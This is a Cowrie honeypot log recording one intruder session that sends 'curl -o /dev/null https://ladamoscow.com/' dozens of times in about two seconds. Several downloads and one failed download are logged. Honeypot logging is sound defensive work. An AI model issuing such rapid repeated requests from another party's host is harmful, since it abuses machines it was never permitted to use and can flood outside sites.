{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.283623Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.324343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.325086Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.364346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.365101Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.402501Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.403309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.440936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.441687Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.492380Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.493187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.531043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.531789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.556006Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.568743Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.569477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.605726Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.609375Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.610013Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.648736Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.649551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.687032Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.687836Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.693375Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.727917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.728690Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.780436Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.781176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.805493Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.819816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.820513Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.857529Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.858327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.911738Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.912471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.949788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.950485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:43.988519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:43.989229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.033849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.034990Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.071901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.072633Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.112116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.112846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.150389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.151134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.193649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.194382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.231130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.231854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.269317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.270036Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.318969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.319736Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.358251Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.359057Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.397185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.398206Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.437111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.437874Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.475561Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.476300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.514185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.514963Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.553195Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.553975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.591174Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.591926Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.635402Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.643649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.644500Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.683757Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.684495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.735096Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.735887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.773141Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.773938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.812594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.813221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.851575Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.852951Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.892098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.892850Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.935508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.936242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:44.973535Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.974291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:44.982792Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.012222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.013165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.051801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.052646Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.089715Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.091552Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.092296Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.140162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.140992Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.178612Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.179485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.218042Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.218608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.257082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.257883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.281926Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.295462Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.296260Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.333988Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.334542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.371931Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.372766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.396353Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.410261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.411011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
